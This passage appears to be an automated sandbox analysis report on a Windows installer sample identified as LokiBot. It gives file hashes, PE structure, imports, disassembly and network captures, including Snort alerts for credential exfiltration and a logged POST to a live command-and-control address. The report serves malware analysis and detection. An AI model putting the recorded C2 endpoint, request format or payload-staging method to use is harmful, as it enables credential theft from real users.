	Chrome.Update.23af76.js	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	Transferencia_29_11_2021 17.03.39.exe	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	part-1500645108.xlsb	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	gXphSPTf52.exe	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	VM845.html	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	Rl3M5OSf6P.exe	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	#U0192#U0e25#U00a2_#U0192#U03b1#U0aee#U01ad#U00b5#U0ae8#U03b1_#U05e0jumozeK_Yim73678.vbs	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	DOC209272621615.PDF.exe	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	item-40567503.xlsb	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	ATT14851.html	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	AtlanticareINV25-67431254.htm	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	WMHighfield.html	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	5WJw8YWsvu.exe	Get hash	malicious	Browse	142.250.203.110 142.250.180.161

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Download File
Process:	C:\Users\user\Desktop\lzJWJgZhPc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	99196928
Entropy (8bit):	0.9333217519599362
Encrypted:	false
SSDEEP:	1536:7p/zRrIP5kbuDX+eSBKsBYUDIAr0fBB8mPQlmYLx:7Prm4aXsBYUDIAraBBR48YLx
MD5:	3C6FB2D5CB7A8CCF575C378C5883EAC2
SHA1:	8896C5D3DCFB5F1BF938E22B8852B9B9CA40BB34
SHA-256:	6E7322135275A9578CFCE25D31A5E50064176AD75C96986F11B68C5199756B32
SHA-512:	1062CAF868D56E2A5406DF0E8112BBB1328E120CE2F98F270012FA692D5AE57FA6994DE62DE5B12D9138E5D97AED3FF4FC803932FBAE43720521714B4520CFB8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L....x.P..........................................@.........................................................................d...(.......`................................................................... ... .......<............................text...X........................... ..`.data...L...........................@....rsrc...`...........................@..@..V............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	99196928
Entropy (8bit):	0.9333217519599362
Encrypted:	false
SSDEEP:
MD5:	3C6FB2D5CB7A8CCF575C378C5883EAC2
SHA1:	8896C5D3DCFB5F1BF938E22B8852B9B9CA40BB34
SHA-256:	6E7322135275A9578CFCE25D31A5E50064176AD75C96986F11B68C5199756B32
SHA-512:	1062CAF868D56E2A5406DF0E8112BBB1328E120CE2F98F270012FA692D5AE57FA6994DE62DE5B12D9138E5D97AED3FF4FC803932FBAE43720521714B4520CFB8
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L....x.P..........................................@.........................................................................d...(.......`................................................................... ... .......<............................text...X........................... ..`.data...L...........................@....rsrc...`...........................@..@..V............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck Download File
Process:	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
File Type:	data
Category:	modified
Size (bytes):	46
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	D898504A722BFF1524134C6AB6A5EAA5
SHA1:	E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
SHA-256:	878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
SHA-512:	26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..............................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	4.768333100076337
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lzJWJgZhPc.exe
File size:	191165
MD5:	46984f492d6314442d1a502d7ab460c4
SHA1:	3515b9159efe0abc0df68d352c4e1bed4391c2fe
SHA256:	4366a0e113d168f2809a4a1983c2198ec874b89af0bdfe465e753d409c85c51c
SHA512:	e87563c2ac5464e9bd1786288dadadfa75ab843d2c02801ad6fb7e05194483fffc79580dc046a8bc313bd78d008758722f590ed6762b3b5f3603268a6b73d02c
SSDEEP:	1536:g/T2X/jN2vxZz0DTHUpou4ubBITyPjcBuwXDxbZpv9u3o7c1As3eDQYdU:gbG7N2kDTHUpou4ubKpxbZbL+V3tZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FB630C0268Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FB630C0265Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4c000	0x11e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	False	0.666126179245	data	6.45839821493	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	False	0.439275568182	data	5.02410928126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	False	0.521484375	data	4.15458210409	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x36000	0x16000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x4c000	0x11e0	0x1200	False	0.368489583333	data	4.48173978815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x4c268	0x368	data	English	United States
RT_ICON	0x4c5d0	0x2e8	data	English	United States
RT_DIALOG	0x4c8b8	0x144	data	English	United States
RT_DIALOG	0x4ca00	0x13c	data	English	United States
RT_DIALOG	0x4cb40	0x100	data	English	United States
RT_DIALOG	0x4cc40	0x11c	data	English	United States
RT_DIALOG	0x4cd60	0xc4	data	English	United States
RT_DIALOG	0x4ce28	0x60	data	English	United States
RT_GROUP_ICON	0x4ce88	0x14	data	English	United States
RT_MANIFEST	0x4cea0	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/02/21-07:09:39.896500	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49761	80	192.168.2.3	63.250.34.171
12/02/21-07:09:39.896500	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.3	63.250.34.171
12/02/21-07:09:39.896500	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.3	63.250.34.171
12/02/21-07:09:39.896500	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49761	80	192.168.2.3	63.250.34.171
12/02/21-07:09:40.850955	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49761	63.250.34.171	192.168.2.3
12/02/21-07:09:43.464229	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49762	80	192.168.2.3	63.250.34.171
12/02/21-07:09:43.464229	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.3	63.250.34.171
12/02/21-07:09:43.464229	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.3	63.250.34.171
12/02/21-07:09:43.464229	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49762	80	192.168.2.3	63.250.34.171
12/02/21-07:09:44.496278	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49762	63.250.34.171	192.168.2.3
12/02/21-07:09:46.686868	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.3	63.250.34.171
12/02/21-07:09:46.686868	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.3	63.250.34.171
12/02/21-07:09:46.686868	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.3	63.250.34.171
12/02/21-07:09:46.686868	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.3	63.250.34.171
12/02/21-07:09:47.621853	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49773	63.250.34.171	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 07:09:36.497488976 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:36.497534990 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:36.497632027 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:36.529236078 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:36.529274940 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:36.582670927 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:36.582797050 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:36.583560944 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:36.583673000 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:36.877294064 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:36.877346039 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:36.877942085 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:36.878022909 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:36.880482912 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:36.920862913 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:37.362169027 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:37.362327099 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:37.362335920 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:37.362430096 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:37.402904034 CET	49758	443	192.168.2.3	142.250.203.110
Dec 2, 2021 07:09:37.402942896 CET	443	49758	142.250.203.110	192.168.2.3
Dec 2, 2021 07:09:37.491516113 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.491580963 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.491681099 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.492430925 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.492464066 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.567094088 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.567209005 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.568141937 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.568248987 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.575545073 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.575567007 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.575784922 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.575849056 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.576436043 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.616861105 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.806472063 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.806596994 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.808422089 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.808521032 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.809906960 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.809992075 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.812954903 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.813040972 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.813064098 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.813123941 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.819904089 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.820004940 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.825232029 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.825328112 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.827230930 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.827315092 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.827333927 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.827394962 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.827938080 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.827999115 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.828017950 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.828078985 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.829437017 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.829509974 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.829530954 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.829591990 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.830902100 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.830976009 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.830991030 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.831048012 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.832367897 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.832436085 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.832454920 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.832511902 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.833863020 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.833935022 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.833949089 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.834001064 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.835346937 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.835422039 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.835438013 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.835494995 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.836910009 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.837048054 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.837064981 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.837132931 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.838376045 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.838444948 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.838462114 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.838521957 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.839869022 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.839936972 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.839952946 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.840007067 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.841345072 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.841417074 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.841435909 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.841494083 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.842822075 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.842878103 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.842894077 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.842959881 CET	49760	443	192.168.2.3	142.250.180.161
Dec 2, 2021 07:09:37.844312906 CET	443	49760	142.250.180.161	192.168.2.3
Dec 2, 2021 07:09:37.844371080 CET	49760	443	192.168.2.3	142.250.180.161

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 07:09:36.455410004 CET	52130	53	192.168.2.3	8.8.8.8
Dec 2, 2021 07:09:36.481583118 CET	53	52130	8.8.8.8	192.168.2.3
Dec 2, 2021 07:09:37.461218119 CET	55102	53	192.168.2.3	8.8.8.8
Dec 2, 2021 07:09:37.489072084 CET	53	55102	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 2, 2021 07:09:36.455410004 CET	192.168.2.3	8.8.8.8	0xa724	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 2, 2021 07:09:37.461218119 CET	192.168.2.3	8.8.8.8	0x9173	Standard query (0)	doc-00-50-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 2, 2021 07:09:36.481583118 CET	8.8.8.8	192.168.2.3	0xa724	No error (0)	drive.google.com		142.250.203.110	A (IP address)	IN (0x0001)
Dec 2, 2021 07:09:37.489072084 CET	8.8.8.8	192.168.2.3	0x9173	No error (0)	doc-00-50-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 2, 2021 07:09:37.489072084 CET	8.8.8.8	192.168.2.3	0x9173	No error (0)	googlehosted.l.googleusercontent.com		142.250.180.161	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-00-50-docs.googleusercontent.com

63.250.34.171

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49758	142.250.203.110	443	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49760	142.250.180.161	443	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49761	63.250.34.171	80	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 07:09:39.896500111 CET	11587	OUT	POST /tickets.php?id=277 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.250.34.171 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AA495C78 Content-Length: 190 Connection: close
Dec 2, 2021 07:09:40.850955009 CET	11588	IN	HTTP/1.1 403 Forbidden Date: Thu, 02 Dec 2021 06:09:39 GMT Server: Apache/2.4.38 (Debian) Content-Length: 287 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 